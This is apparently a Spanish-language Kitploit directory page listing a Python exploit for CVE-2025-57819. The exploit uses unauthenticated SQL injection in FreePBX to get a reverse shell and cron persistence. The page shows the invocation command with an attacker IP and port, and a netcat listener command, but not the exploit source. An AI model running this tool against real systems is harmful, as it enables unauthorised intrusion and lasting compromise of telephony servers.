Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
cve-2025-57819-exploit — Exploit de Python para CVE-2025-57819 dirigido a FreePBX mediante inyección SQL no autenticada para lograr la ejecución remota de código con shell inverso automático y persistencia basada en cron. | Kitploit
Herramientas/GitHubGitHub/its1zero/cve-2025-57819-exploit
Mecanismos de PersistenciaAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubits1zero/cve-2025-57819-exploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →

cve-2025-57819-exploit

Exploit de Python para CVE-2025-57819 dirigido a FreePBX mediante inyección SQL no autenticada para lograr la ejecución remota de código con shell inverso automático y persistencia basada en cron.

Ver Repositorio
5hace 2 mesesAún no revisado
Compartir

CVE-2025-57819 Exploit

Metadatos

  • Gravedad: Crítica (9.8)
  • Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
  • Tipo: Inyección SQL no autenticada → Ejecución remota de código
  • Software afectado: FreePBX (módulo endpoint) < 15.0.66, < 16.0.89 y < 17.0.3
  • Probado en: FreePBX 16.0.40.7 en CentOS 7 con Apache 2.4

Resumen

Este script explota CVE-2025-57819 en un módulo endpoint vulnerable de FreePBX. La vulnerabilidad permite inyección SQL, que se aprovecha para inyectar trabajos cron maliciosos.

No hay pasos adicionales necesarios, a diferencia de otros exploits públicos que requieren interactuar con el objetivo a través de una webshell subida. Es un enfoque directo que te proporciona acceso directo a una reverse shell.

Impacto

La ejecución remota de código se logra mediante inyección SQL y manipulación de trabajos cron. Una explotación exitosa resulta en una reverse shell en el sistema objetivo. Dependiendo de la configuración, esto puede llevar al compromiso total del sistema.

Características

  • Inyección SQL a través de un endpoint AJAX vulnerable
  • Generación automática del payload de reverse shell
  • Persistencia del trabajo cron mediante ejecución programada cada minuto (* * * * *)
  • Limpieza automática del trabajo cron inyectado
  • Utiliza payloads codificados en hexadecimal, ya que los payloads base64 se corrompen cuando los caracteres + se interpretan como espacios.

Uso

Ejecuta el exploit proporcionando el objetivo y la configuración del listener:

root@kitploit:~
python3 cve-2025-57819.py <target> <lhost> <lport>

Parámetros

  • <target>: Hostname o dirección IP del objetivo (instancia FreePBX vulnerable)
  • <lhost>: Dirección IP del atacante para el callback de la reverse shell
  • <lport>: Puerto en escucha para la conexión entrante

Ejemplo:

root@kitploit:~
python3 cve-2025-57819.py freepbx.local 10.10.16.38 9999

Configuración del Listener

Inicia un listener antes de ejecutar el exploit:

root@kitploit:~
nc -lvnp <port>

Ejemplo:

root@kitploit:~
nc -nlvp 9999

Descargo de responsabilidad

Esta herramienta está destinada únicamente a fines educativos y pruebas de seguridad autorizadas. El uso no autorizado contra sistemas sin permiso explícito es ilegal. El autor no asume ninguna responsabilidad por el mal uso o los daños causados por esta herramienta.

Autor

Its1Zero - [email protected]

Referencias

  • https://nvd.nist.gov/vuln/detail/cve-2025-57819
  • https://github.com/freepbx/security-reporting/security/advisories/ghsa-m42g-xg4c-5f3h
  • https://github.com/watchtowrlabs/watchTowr-vs-FreePBX-CVE-2025-57819
Descargar herramienta